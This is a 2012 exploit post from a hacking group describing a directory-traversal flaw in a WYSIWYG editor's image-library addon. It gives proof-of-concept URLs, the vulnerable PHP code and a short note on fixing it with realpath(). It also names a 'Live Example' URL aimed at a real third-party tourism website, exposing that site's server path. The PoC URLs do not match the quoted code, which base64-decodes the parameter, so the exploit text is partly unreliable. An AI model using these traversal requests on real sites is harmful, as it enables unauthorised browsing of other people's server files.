
Wysiwyg Imagelibrary Traversal

Posted on 25 October 2012

# Author : Geek
# Title : Wysiwyg Imagelibrary Addons (Folders Traversal)
# Date : Today :P
# Site : Sec4ever.com

# p0x :

{x} http://localhost/lol/wysiwyg/addons/imagelibrary/select_image.php?dir=full path to public_html or httpdocs
{x} http://localhost/lol/wysiwyg/addons/imagelibrary/select_image.php?dir=..%2Fhome..%2Fuser..%2Fpublic_html

# Code :

```php
$get_dir = isset($_GET['dir']) ? prepare_input($_GET['dir']) : "";
......
if($get_dir){
    $dir = base64_decode($get_dir);
    if(substr($dir, -1, 1)!='/') {
        $dir = $dir . '/';
    }
    $dirok = true;
    $dirnames = split('/', $dir);
    for($di=0; $di<sizeof($dirnames); $di++) {
        if($di<(sizeof($dirnames)-2)) {
            $dotdotdir = $dotdotdir . $dirnames[$di] . '/';
        }
    }
    if(substr($dir, 0, 1)=='/') {
        $dirok = false;
    }
    if($dir == $leadon) {
        $dirok = false;
    }
    if($dirok) {
        $leadon = $dir;
    }
}
$opendir = $leadon;
if(!$leadon) $opendir = '.';
if(!file_exists($opendir)) {
    $opendir = '.';
    $leadon = $startdir;
}
```

Note: the only checks applied to the decoded directory are a leading `/` and equality with the current `$leadon`; `..` segments are never rejected (`$dotdotdir` is built but never used for validation), so whatever path survives those two checks is used as-is. The defensive fix is to resolve the decoded path with `realpath()` and refuse it unless the result stays inside the configured image root.

# Live Example :

{X} http://www.tourismhalong.com/includes/wysiwyg/addons/imagelibrary/select_image.php?dir=%2Fhome%2Ftouris8%2Fpublic_html

# Greet'z : b0x,Sec4ever,paulzz,The Sword,The Injector,B07 M4ST3R,Jago :P,LinuxAC,Cmos-CLR :P <3 And All Sec4ever VIP Members And Others :)

 
